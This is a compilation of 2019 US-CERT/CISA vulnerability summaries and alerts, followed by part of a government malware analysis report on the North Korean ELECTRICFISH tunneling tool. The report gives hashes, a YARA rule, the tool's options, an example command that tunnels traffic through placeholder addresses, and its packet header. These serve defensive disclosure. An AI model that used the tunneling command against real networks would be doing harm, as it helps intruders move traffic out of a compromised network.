MISCsiemens -- sinema_remote_connect_server A vulnerability has been identified in SINEMA Remote Connect Server (All versions < V2.0 SP1). An attacker with administrative privileges can obtain the hash of a connected device's password. The security vulnerability could be exploited by an attacker with network access to the SINEMA Remote Connect Server and administrative privileges. At the time of advisory publication no public exploitation of this security vulnerability was known. 2019-09-13 not yet calculated CVE-2019-13922
MISCstmicroelectronics -- stm32l_family_devices On STMicroelectronics STM32L0, STM32L1, STM32L4, STM32F4, STM32F7, and STM32H7 devices, Proprietary Code Read Out Protection (PCROP) (a software IP protection method) can be defeated by observing CPU registers and the effect of code/instruction execution. 2019-09-12 not yet calculated CVE-2019-14236
MISCvivotek -- ipcam_firmware An authentication bypass vulnerability in VIVOTEK IPCam versions prior to 0x13a was found. 2019-09-10 not yet calculated CVE-2019-10256
CONFIRM
MISCvivotek -- ipcam_firmware VIVOTEK IP Camera devices with firmware before 0x20x have a stack-based buffer overflow via a crafted HTTP header. 2019-09-10 not yet calculated CVE-2019-14457
CONFIRMwordpress -- wordpress The fs-shopping-cart plugin 2.07.02 for WordPress has SQL injection via the pid parameter. 2019-09-13 not yet calculated CVE-2016-10951
MISC
MISC
MISCwordpress -- wordpress The Post Indexer plugin before 3.0.6.2 for WordPress has SQL injection via the period parameter by a super admin. 2019-09-13 not yet calculated CVE-2016-10947
MISCwordpress -- wordpress The Post Indexer plugin before 3.0.6.2 for WordPress has incorrect handling of data passed to the unserialize function. 2019-09-13 not yet calculated CVE-2016-10948
MISCwordpress -- wordpress The Relevanssi Premium plugin before 1.14.6.1 for WordPress has SQL injection with resultant unsafe unserialization. 2019-09-13 not yet calculated CVE-2016-10949
MISCwordpress -- wordpress Cross-site request forgery (CSRF) vulnerability in Category Specific RSS feed Subscription version v2.0 and earlier allows remote attackers to hijack the authentication of administrators via unspecified vectors. 2019-09-12 not yet calculated CVE-2019-5993
MISCwordpress -- wordpress The quotes-collection plugin before 2.0.6 for WordPress has XSS via the wp-admin/admin.php?page=quotes-collection page parameter. 2019-09-13 not yet calculated CVE-2016-10952
MISC
MISC
MISCwordpress -- wordpress The Neosense theme before 1.8 for WordPress has qquploader unrestricted file upload. 2019-09-13 not yet calculated CVE-2016-10954
MISCwordpress -- wordpress The cysteme-finder plugin before 1.4 for WordPress has unrestricted file upload because of incorrect session tracking. 2019-09-13 not yet calculated CVE-2016-10955
MISC
MISCwordpress -- wordpress The Swape theme before 1.2.1 for WordPress has incorrect access control, as demonstrated by allowing new administrator accounts via vectors involving xmlPath to wp-admin/admin-ajax.php. 2019-09-09 not yet calculated CVE-2018-21013
MISCwordpress -- wordpress The multisite-post-duplicator plugin before 1.1.3 for WordPress has wp-admin/tools.php?page=mpd CSRF. 2019-09-13 not yet calculated CVE-2016-10944
MISC
MISCwordpress -- wordpress The wp-d3 plugin before 2.4.1 for WordPress has CSRF. 2019-09-13 not yet calculated CVE-2016-10946
MISC
MISCThis product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 10, 2019
Intel has released security updates to address vulnerabilities in multiple products. An attacker could exploit one of these vulnerabilities to gain an escalation of privileges on a previously infected machine.
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Intel's Security Advisories INTEL-SA-00290 and INTEL-SA-00285 and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 10, 2019
Google has released Chrome version 77.0.3865.75 for Windows, Mac, and Linux. This version addresses multiple vulnerabilities that an attacker could exploit to take control of an affected system.
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 10, 2019
The Multi-State Information Sharing & Analysis Center (MS-ISAC) has released a Security Event Primer on Malware. The white paper outlines general malware operations and includes common malware event types and best practice recommendations. An attacker can use malware to gain access to a network, obtain sensitive data, and damage systems.
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review MS-ISAC?s White Paper: Security Event Primer ? Malware, see CISA?s Tip on Protecting Against Malicious Code, and implement the recommended best practices.
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 10, 2019
Microsoft has released updates to address multiple vulnerabilities in Microsoft software. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Microsoft?s September 2019 Security Update Summary and Deployment Information and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 10, 2019
Adobe has released security updates to address vulnerabilities affecting Flash Player and Application Manager. An attacker could exploit these vulnerabilities to take control of an affected system.
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review Adobe Security Bulletins APSB19-45 and APSB19-46 and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 9, 2019
The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have identified two malware variants?referred to as ELECTRICFISH and BADCALL?used by the North Korean government. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA.
CISA encourages users and administrators to review the HIDDEN COBRA - North Korean Malicious Cyber Activity page, which contains links to Malware Analysis Reports MAR-10135536-21 and MAR-10135536-10, for more information.
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 9, 2019
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 9, 2019
The Federal Bureau of Investigation (FBI) has launched the Safe Online Surfing (SOS) Challenge, encouraging educators to promote web literacy and safety for students during the 2019-20 school year. FBI developed the program to educate children on how to navigate the web securely using activities that correspond with specific grade levels. Public, private, and home schools with at least five students are eligible to participate in the online challenge.
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users to review the FBI SOS Challenge Announcement and the CISA Tip Keeping Children Safe Online.
This product is provided subject to this Notification and this Privacy & Use policy.
- Original release date: September 9, 2019
Notification
This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.
This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.
Summary
Description
This Malware Analysis Report (MAR) is the result of analytic efforts between the Department of Homeland Security (DHS), the Federal Bureau of Investigation (FBI), and the Department of Defense (DoD). Working with U.S. Government partners, DHS, FBI, and DoD identified proxy malware variants used by the North Korean government - referred to by the U.S. Government as ELECTRICFISH. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https[:]//www[.]us-cert.gov/hiddencobra.
DHS, FBI, and DoD are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity.
This MAR includes malware descriptions related to HIDDEN COBRA, suggested response actions and recommended mitigation techniques. Users or administrators should flag activity associated with the malware, report the activity to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give the activity the highest priority for enhanced mitigation.
This report provides analysis of two malicious 32-bit Windows executable file. The malware implements a custom protocol that allows traffic to be tunneled between a source and a destination Internet Protocol (IP) address. The malware continuously attempts to reach out to the source and the designation system, which allows either side to initiate a tunneling session. The malware can be configured with a proxy server/port and proxy username and password. This feature allows connectivity to a system sitting inside of a proxy server, which allows the actor to bypass the compromised system?s required authentication to reach outside of the network.For a downloadable copy of IOCs, see:
Submitted Files (2)
7cf5d86cc75cd8f0e22e35213a9c051b740bd4667d9879a446f06277782bffd1 (0BA6BB2AD05D86207B5303657E3F68...)
a1260fd3e9221d1bc5b9ece6e7a5a98669c79e124453f2ac58625085759ed3bb (8d9123cd2648020292b5c35edc9ae2...)
Findings
a1260fd3e9221d1bc5b9ece6e7a5a98669c79e124453f2ac58625085759ed3bb
Tags
droppertrojan
Details
Name 8d9123cd2648020292b5c35edc9ae22e Size 1422336 bytes Type PE32 executable (GUI) Intel 80386, for MS Windows MD5 8d9123cd2648020292b5c35edc9ae22e SHA1 0939363ff55d914e92635e5f693099fb28047602 SHA256 a1260fd3e9221d1bc5b9ece6e7a5a98669c79e124453f2ac58625085759ed3bb SHA512 646697e3d5146e05a221183f6c9f00f5eb38400ef9a2f83bfd0fcf2f8af1a7efff99c0a3486740c745ce6cf0939c4f0678cb818cbbff8ed2b28a703fe8d823bb ssdeep 24576:HsO8RKL6OLnWZGFbHq0aMow5Q3gkD/74tU3hYPgP5IyrMsEOhVRpxHkADUHEPbzJ:0KjKHMbO3pkoBIyIstVRpxHL1bF Entropy 6.703195 Antivirus
Ahnlab HackTool/Win32.Agent Antiy Trojan[Banker]/Win32.Alreay Avira TR/AD.Stantinko.gkqij BitDefender Gen:Variant.Ursu.349885Unclassified ClamAV Win.Dropper.Electricfish-6976665-0 Cyren W32/Trojan.TWUO-7654 ESET a variant of Win32/NukeSped.FQ trojan Emsisoft Gen:Variant.Ursu.349885 (B) Ikarus Trojan.Win32.HackTool K7 Hacktool ( 0054e46d1 ) Kaspersky Trojan.Win32.Agent.xaadtn McAfee ElectricFish Microsoft Security Essentials HackTool:Win32/ElecFish.A!dha NANOAV Trojan.Win32.Alreay.fvrmai Quick Heal Trojan.Ursu Sophos Troj/ElecFish-A Symantec Unavailable (production) TACHYON Trojan/W32.Electricfish.1422336 VirusBlokAda Trojan.Agent Zillya! Tool.ElectricFish.Win32.2 Yara Rules
hidden_cobra_consolidated.yara rule electricfish { meta: Author = "CISA trusted 3rd party" Incident = "10135536" Date = "2019-08-14" Category = "Hidden_Cobra" Family = "ELECTRICFISH" Description = "Detects logging functionality" MD5_1 = "0ba6bb2ad05d86207b5303657e3f6874" SHA256_1 = "7cf5d86cc75cd8f0e22e35213a9c051b740bd4667d9879a446f06277782bffd1" strings: $ = "LLgcIP" $ = "CCGC_LOG" $ = "LLGC_LOG" condition: uint16(0) == 0x5a4d and uint16(uint32(0x3c)) == 0x4550 and all of them } ssdeep Matches
No matches found.
PE Metadata
Compile Date 2018-09-29 11:55:36-04:00 Import Hash 3549cfa19e60aa9239f79d80e19279fa PE Sections
MD5 Name Raw Size Entropy 08bb17d8e839e7fc92426e813a696e73 header 1024 2.590786 6c3daca3c522ab98a8ac12a45087297c .text 983040 6.595856 3d3d7962d16652002018640a3fa27d44 .rdata 340480 6.187858 b7f382ea7e6c9c8e737cb92551341e64 .data 37888 4.714377 871fb8486e5ea3307ff7b65ddf46518a .rsrc 512 5.112624 382715f8e776a544bf70f843a52e3ff2 .reloc 59392 6.015022 Packers/Compilers/Cryptors
Microsoft Visual C++ ?.? Description
This file is a malicious Windows 32-bit executable. The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts the following command-line arguments, which can be utilized to authenticate with a proxy server:
--Begin command-line arguments--
-l,--log [Show Debug Message]
-pw,--password [Password]
-u,--username [UserName]
-do,--domain [DomainName]
-p,--proxy [ProxyIP:Port]
-d,--destination [TargetIP:Port]
-s,--server [LLgcIP:Port]
-h,--help [Show this help message]
--End command-line arguments--
Displayed below is an example:
--Begin Example Usage--
Source IP/Port: 192.0.2.1:92
Dest IP/Port: 198.51.100.1:92
Proxy IP/Port: 203.0.113.1:92
Proxy User Name: test
Proxy Password: testpw
a12.exe -s 192.0.2.1:92 -d 198.51.100.1:92 -p 203.0.113.1:92 -u test -pw testpw?
--End Example Usage--
It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.
After the malware authenticates with the configured proxy, it will immediately attempt to establish a session with the destination IP address, located outside of the target network and the source IP address. The header of the initial authentication packet, sent to both the source and destination systems, will be static except for two random bytes. Everything within this 34-byte header is static except for the bytes 0X2B6E, which will change during each connection attempt. Displayed below (and displayed in Figure 7) is the packet header.
--Begin Authentication Packet Sent to Destination System--
6161616162626262636363636464646400000000000000002B6E0000040000009210
--End Authentication Packet Sent to Destination System--Screenshots
Figure 1 -
Figure 2 -